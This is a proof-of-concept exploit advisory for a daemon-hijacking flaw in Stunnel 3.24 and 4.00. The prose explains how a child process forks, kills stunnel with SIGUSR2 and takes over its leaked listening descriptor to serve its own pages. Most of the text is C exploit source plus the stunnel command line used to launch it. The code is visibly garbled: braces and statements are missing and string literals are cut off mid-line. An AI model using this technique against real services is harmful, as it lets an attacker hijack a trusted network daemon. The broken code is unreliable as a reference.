Stunnel <= 3.24, 4.00 Daemon Hijacking proof of concept

/* By Steve Grubb : The technique is simple. 
                              * 1) Fork so that stunnel can't find you when it dies.
                              * 2) Send stunnel a SIGUSR2. Unhandled signals generally
                              * kill programs. Since you are a child of stunnel, the OS
                              * will deliver the signal.
                              * 3) Select on the leaked descriptor and start serving pages.
                              * At the end of this advisory is a proof-of-concept
                              * program that you can run under Stunnel. It is assumed
                              * that Stunnel is providing you shell-like access (Telnet
                              * over SSL, for example), or that the program lauched via
                              * Stunnel has some exploitable condition that allows you
                              * to run arbitrary code.
                              * To run the POC code, you can execute it directly as the
                              * local program (-l argument) for Stunnel :
                              * /usr/sbin/stunnel -s nobody -g nobody -D 7 -p
                              * /etc/ssl/certs/stunnel.pem -o /tmp/stunnel.log -P
                              * /tmp/ -d 2222 -l
                              * /opt/stunnel-sploit/leak-sploit -- leak-sploit
                              * Then connect to stunnel like: lynx https://localhost:2222
                              * The first time, you will get a message saying
                              * "Unexpected network read error" followed by "Document
                              * can't be accessed". Then connect again. The second
                              * time, you will see the "You're owned" message. Doing a
                              * ps -ef shows that stunnel is long gone and replaced by
                              * the example application...even though user & group were
                              * nobody. Sure its a bit contrived, but illustrates the concept.


                              * The basic scheme goes like this:
                              *      1) Get rid of the parent
                              *      2) init the openssl library
                              *      3) start handling requests

                              /* You may need to adjust these next 3 items */
                              #define LISTEN_DESCRIPTOR 6
                              #define CERTF "/opt/stunnel-sploit/foo-cert.pem"
                              #define KEYF  "/opt/stunnel-sploit/foo-cert.pem"

                              static SSL_CTX    *ctx;
                              static SSL        *ssl;
                              static X509       *client_cert;
                              static SSL_METHOD *meth;

                              static void server_loop(int descr);
                              static void ssl_init(void);

                              int main(int argc, char *argv[])
                              int pid = getppid();

                              /* Need to fork so stunnel doesn't kill us */
                              if (fork() == 0) {
                              /* Become session leader */

                              /* Goodbye - thanks for the descriptor */
                              kill(pid, SIGUSR2);
                              close(0); close(1); close(2);
                              return 0;

                              static void server_loop(int descr)
                              struct timeval   tv;
                              fd_set read_mask ;

                              FD_SET(descr, &read_mask);
                              for (;;) {
                              struct sockaddr_in remote;
                              socklen_t len = sizeof(remote);
                              int fd;

                              if (select(descr+1, &read_mask, NULL, NULL, 0 )
                              == -1)
                              fd = accept(descr, &remote, &len);
                              if (fd >=0) {
                              char obuf[4096];

                              if ((ssl = SSL_new (ctx)) != NULL) {
                              SSL_set_fd (ssl, fd);
                              if ((SSL_accept (ssl)) == -1)
                              strcpy(obuf, "HTTP/1.0 200 OK\n");
                              strcat(obuf, "Content-Length: 40\n");
                              strcat(obuf, "Content-Type:
                              strcat(obuf, "You're
                              SSL_write (ssl, obuf, strlen(obuf));
                              SSL_free (ssl);
                              SSL_CTX_free (ctx);  /* Never gets called */

                              static void ssl_init(void)
                              meth = SSLv23_server_method();
                              ctx = SSL_CTX_new (meth);
                              if (!ctx)
                              if (SSL_CTX_use_certificate_file(ctx, CERTF,
                              SSL_FILETYPE_PEM) <= 0)
                              if (SSL_CTX_use_PrivateKey_file(ctx, KEYF,
                              SSL_FILETYPE_PEM) <= 0)
                              if (!SSL_CTX_check_private_key(ctx))


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